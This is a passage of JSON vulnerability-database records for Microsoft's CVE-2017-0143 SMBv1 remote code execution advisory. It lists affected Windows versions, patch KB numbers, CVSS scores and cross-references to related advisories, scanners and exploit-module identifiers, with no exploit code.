x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-11T12:52:00", "differentElements": ["msAffectedSoftware"], "edition": 31}, {"bulletin": {"id": "MS:CVE-2017-0143", "hash": "f7b4e50f4ef2188508dc09f5f5ce8194", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0143", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-09-11T15:08:23", "history": [], "viewCount": 9, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0143"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B"]}, {"type": "symantec", "idList": ["SMNTC-96703"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "threatpost", "idList": ["THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:43C3E019D454987EF522E299C31E9D3F", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:7D1D823549046978FD52257C68DF7801"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:BC214880895281474C1A8EF7B7D98C13", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:154690", "PACKETSTORM:142548", "PACKETSTORM:146236", "PACKETSTORM:142181"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41987", "EDB-ID:43970", "EDB-ID:41891"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-29702", "1337DAY-ID-33895", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-33313"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL", "700099.PRM", "700059.PRM"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "kaspersky", "idList": ["KLA10979", "KLA10977", "KLA11902"]}, {"type": "ics", "idList": ["ICSMA-20-170-01", "ICSMA-18-058-02"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"]}], "modified": "2021-09-11T11:22:34", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-09-11T11:22:34", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4012215", "KBMS16-110, 3187754", "KB3212646", "KB3210720", "KB4013198", "KB4012216", "KB3205401", "KB4012598", "KB3210721", "KB4013429", "KB4012217", "KB4012606", "KB4012212", "KB4012213", "KB3205409", "KB3213986", "KB3177186", "KB4012214"], "msrc": "", "mscve": "CVE-2017-0143", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-11T15:08:23", "differentElements": ["msAffectedSoftware"], "edition": 32}, {"bulletin": {"id": "MS:CVE-2017-0143", "hash": "bdbcad436fc25396d6ee8890a5e6edb2", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0143", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-09-11T16:48:04", "history": [], "viewCount": 9, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0143"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B"]}, {"type": "symantec", "idList": ["SMNTC-96703"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "threatpost", "idList": ["THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:43C3E019D454987EF522E299C31E9D3F", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:7D1D823549046978FD52257C68DF7801"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:BC214880895281474C1A8EF7B7D98C13", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:154690", "PACKETSTORM:142548", "PACKETSTORM:146236", "PACKETSTORM:142181"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41987", "EDB-ID:43970", "EDB-ID:41891"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-29702", "1337DAY-ID-33895", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-33313"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL", "700099.PRM", "700059.PRM"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "kaspersky", "idList": ["KLA10979", "KLA10977", "KLA11902"]}, {"type": "ics", "idList": ["ICSMA-20-170-01", "ICSMA-18-058-02"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"]}], "modified": "2021-09-11T11:22:34", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-09-11T11:22:34", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB3205401", "KB4013198", "KB3210721", "KB4012214", "KBMS16-110, 3187754", "KB4012598", "KB4012215", "KB3177186", "KB3210720", "KB3212646", "KB4012217", "KB4013429", "KB3205409", "KB4012216", "KB3213986", "KB4012212", "KB4012606", "KB4012213"], "msrc": "", "mscve": "CVE-2017-0143", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-11T16:48:04", "differentElements": ["msAffectedSoftware"], "edition": 33}, {"bulletin": {"id": "MS:CVE-2017-0143", 